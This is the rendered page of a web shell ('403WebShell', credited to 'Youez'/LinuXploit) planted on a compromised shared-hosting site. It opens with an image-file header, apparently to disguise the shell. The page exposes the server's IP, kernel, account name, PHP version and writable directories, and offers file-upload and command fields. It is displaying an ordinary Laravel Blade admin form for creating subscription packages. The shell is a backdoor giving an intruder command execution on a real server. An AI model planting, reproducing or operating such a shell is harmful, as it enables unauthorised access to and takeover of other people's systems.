����JFIF��x�x����'403WebShell
403Webshell
Server IP : 66.29.137.217  /  Your IP : 18.188.228.10
Web Server : LiteSpeed
System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : gltevjme ( 1095)
PHP Version : 7.0.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/gltevjme/././bofirm.gltechlimited.com/resources/views/admin/subscriptions/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/gltevjme/././bofirm.gltechlimited.com/resources/views/admin/subscriptions/create.blade.php
@extends('layouts.admin')

@section('content')
<!-- Page content area start -->
<div class="page-content">
    <div class="container-fluid">
        <div class="row">
            <div class="col-md-12">
                <div class="breadcrumb__content">
                    <div class="breadcrumb__content__left">
                        <div class="breadcrumb__title">
                            <h2>{{ __('Add Subscription Package') }}</h2>
                        </div>
                    </div>
                    <div class="breadcrumb__content__right">
                        <nav aria-label="breadcrumb">
                            <ul class="breadcrumb">
                                <li class="breadcrumb-item"><a
                                        href="{{route('admin.dashboard')}}">{{__('Dashboard')}}</a></li>
                                <li class="breadcrumb-item active" aria-current="page">{{ __('Add Subscription Package')
                                    }}</li>
                            </ul>
                        </nav>
                    </div>
                </div>
            </div>
        </div>
        <div class="row">
            <div class="col-md-12">
                <div class="customers__area bg-style mb-30">
                    <div class="item-title d-flex justify-content-between">
                        <h2>{{ __('Add Subscription Package') }}</h2>
                    </div>
                    <form action="{{route('admin.subscriptions.store')}}" method="post" class="form-horizontal"
                        enctype="multipart/form-data">
                        @csrf
                        <div class="row">
                            <div class="col-md-6">
                                <div class="input__group mb-25">
                                    <label>{{__('Title')}} <span class="text-danger">*</span></label>
                                    <input type="text" name="title" value="{{old('title')}}"
                                        placeholder="{{ __('Title') }}" class="form-control" required>
                                    @if ($errors->has('title'))
                                    <span class="text-danger"><i class="fas fa-exclamation-triangle"></i> {{
                                        $errors->first('title') }}</span>
                                    @endif
                                </div>
                            </div>

                            <div class="col-md-6">
                                <div class="input__group mb-25">
                                    <label>{{__('Price Monthly')}} <span class="text-danger">*</span></label>
                                    <input type="number" min=0 name="monthly_price" value="{{old('monthly_price')}}"
                                        placeholder="{{ __('Price Monthly') }}" class="form-control" required>
                                    @if ($errors->has('monthly_price'))
                                    <span class="text-danger"><i class="fas fa-exclamation-triangle"></i> {{
                                        $errors->first('monthly_price') }}</span>
                                    @endif
                                </div>
                            </div>
                            <div class="col-md-6">
                                <div class="input__group mb-25">
                                    <label>{{__('Discounted Price Monthly')}} <span class="text-danger">*</span></label>
                                    <input type="number" min=0 name="discounted_monthly_price"
                                        value="{{old('discounted_monthly_price')}}"
                                        placeholder="{{ __('Discounted Price Monthly') }}" class="form-control"
                                        required>
                                    @if ($errors->has('discounted_monthly_price'))
                                    <span class="text-danger"><i class="fas fa-exclamation-triangle"></i> {{
                                        $errors->first('discounted_monthly_price') }}</span>
                                    @endif
                                </div>
                            </div>
                            <div class="col-md-6">
                                <div class="input__group mb-25">
                                    <label>{{__('Price Yearly')}} <span class="text-danger">*</span></label>
                                    <input type="number" min=0 name="yearly_price" value="{{old('yearly_price')}}"
                                        placeholder="{{ __('Price Yearly') }}" class="form-control" required>
                                    @if ($errors->has('yearly_price'))
                                    <span class="text-danger"><i class="fas fa-exclamation-triangle"></i> {{
                                        $errors->first('yearly_price') }}</span>
                                    @endif
                                </div>
                            </div>
                            <div class="col-md-6">
                                <div class="input__group mb-25">
                                    <label>{{__('Discounted Price Yearly')}} <span class="text-danger">*</span></label>
                                    <input type="number" min=0 name="discounted_yearly_price"
                                        value="{{old('discounted_yearly_price')}}"
                                        placeholder="{{ __('Discounted Price Yearly') }}" class="form-control" required>
                                    @if ($errors->has('discounted_yearly_price'))
                                    <span class="text-danger"><i class="fas fa-exclamation-triangle"></i> {{
                                        $errors->first('discounted_yearly_price') }}</span>
                                    @endif
                                </div>
                            </div>
                            <div class="col-md-6">
                                <div class="input__group mb-25">
                                    <label>{{__('Enroll Course Limit')}} <span class="text-danger">*</span></label>
                                    <input type="number" min=0 name="course" value="{{old('course', 0)}}"
                                        placeholder="{{ __('Enroll Course Limit') }}" class="form-control" required>
                                    @if ($errors->has('course'))
                                    <span class="text-danger"><i class="fas fa-exclamation-triangle"></i> {{
                                        $errors->first('course') }}</span>
                                    @endif
                                </div>
                            </div>

                            <div class="col-md-6">
                                <div class="input__group mb-25">
                                    <label>{{__('Bundle Course Limit')}} <span class="text-danger">*</span></label>
                                    <input type="number" min=0 name="bundle_course" value="{{old('bundle_course', 0)}}"
                                        placeholder="{{ __('Bundle Course Limit') }}" class="form-control" required>
                                    @if ($errors->has('bundle_course'))
                                    <span class="text-danger"><i class="fas fa-exclamation-triangle"></i> {{
                                        $errors->first('bundle_course') }}</span>
                                    @endif
                                </div>
                            </div>

                            <div class="col-md-6">
                                <div class="input__group mb-25">
                                    <label>{{__('Consulaltency Limit')}} <span class="text-danger">*</span></label>
                                    <input type="number" min=0 name="consultancy" value="{{old('consultancy', 0)}}"
                                        placeholder="{{ __('Consulaltency Limit') }}" class="form-control" required>
                                    @if ($errors->has('consultancy'))
                                    <span class="text-danger"><i class="fas fa-exclamation-triangle"></i> {{
                                        $errors->first('consultancy') }}</span>
                                    @endif
                                </div>
                            </div>

                            <div class="col-md-6">
                                <div class="input__group mb-25">
                                    <label>{{__('Device Limit')}} <span class="text-danger">*</span></label>
                                    <input type="number" min=1 name="device" value="{{old('device', 1)}}"
                                        placeholder="{{ __('Device Limit') }}" class="form-control" required>
                                    @if ($errors->has('device'))
                                    <span class="text-danger"><i class="fas fa-exclamation-triangle"></i> {{
                                        $errors->first('device') }}</span>
                                    @endif
                                </div>
                            </div>

                            <div class="col-md-6">
                                <div class="input__group mb-25">
                                    <label class="label-text-title color-heading font-medium font-16 mb-3">{{ __('Show
                                        in Home')
                                        }} <span class="text-danger">*</span></label>
                                    <select class="form-control" name="in_home">
                                        <option value="{{ PACKAGE_STATUS_ACTIVE }}">{{ __('YES') }}</option>
                                        <option value="{{ PACKAGE_STATUS_DISABLED }}">{{ __('NO') }}</option>
                                    </select>
                                    @if ($errors->has('in_home'))
                                    <span class="text-danger"><i class="fas fa-exclamation-triangle"></i> {{
                                        $errors->first('in_home') }}</span>
                                    @endif
                                </div>
                            </div>

                            <div class="col-md-6">
                                <div class="input__group mb-25">
                                    <label class="label-text-title color-heading font-medium font-16 mb-3">{{
                                        __('Recomended')
                                        }} <span class="text-danger">*</span></label>
                                    <select class="form-control" name="recommended">
                                        <option value="{{ PACKAGE_STATUS_DISABLED }}">{{ __('NO') }}</option>
                                        <option value="{{ PACKAGE_STATUS_ACTIVE }}">{{ __('YES') }}</option>
                                    </select>
                                    @if ($errors->has('recommended'))
                                    <span class="text-danger"><i class="fas fa-exclamation-triangle"></i> {{
                                        $errors->first('recommended') }}</span>
                                    @endif
                                </div>
                            </div>

                            <div class="col-md-6">
                                <div class="input__group mb-25">
                                    <label class="label-text-title color-heading font-medium font-16 mb-3">{{
                                        __('Order')
                                        }} <span class="text-danger">*</span></label>
                                    <input type="number" min=1 value="1" name="order" required>
                                    @if ($errors->has('description'))
                                    <span class="text-danger"><i class="fas fa-exclamation-triangle"></i> {{ $errors->first('order') }}</span>
                                    @endif
                                </div>
                            </div>

                            <div class="col-md-12">
                                <div class="input__group mb-25">
                                    <label>{{ __('Description') }}</label>
                                    <textarea name="description" rows="3">{{ old('description') }}</textarea>
                                    @if ($errors->has('description'))
                                    <span class="text-danger"><i class="fas fa-exclamation-triangle"></i> {{
                                        $errors->first('description') }}</span>
                                    @endif
                                </div>
                            </div>
                        </div>

                        <div class="row">
                            <div class="col-md-3">
                                <label>{{ __('Icon') }} <span class="text-danger">*</span></label>
                                <div class="upload-img-box mb-25">
                                    <img src="">
                                    <input type="file" name="icon" id="icon" accept="image/*"
                                        onchange="previewFile(this)">
                                    <div class="upload-img-box-icon">
                                        <i class="fa fa-camera"></i>
                                        <p class="m-0">{{__('Image')}}</p>
                                    </div>
                                </div>
                            </div>
                            @if ($errors->has('icon'))
                            <span class="text-danger"><i class="fas fa-exclamation-triangle"></i> {{
                                $errors->first('icon') }}</span>
                            @endif
                            <p>{{ __('Accepted Image Files') }}: JPEG, JPG, PNG <br> {{ __('Accepted Size') }}: 80 x
                                80 (300KB)</p>
                        </div>

                        <div class="row mb-3">
                            <div class="col-md-12 text-right">
                                <button class="btn btn-primary" type="submit">{{ __('Save') }}</button>
                            </div>
                        </div>

                    </form>
                </div>
            </div>
        </div>

    </div>
</div>
<!-- Page content area end -->
@endsection

@push('style')
<link rel="stylesheet" href="{{asset('admin/css/custom/image-preview.css')}}">
@endpush

@push('script')
<script src="{{asset('admin/js/custom/image-preview.js')}}"></script>
@endpush

Youez - 2016 - github.com/yon3zu
LinuXploit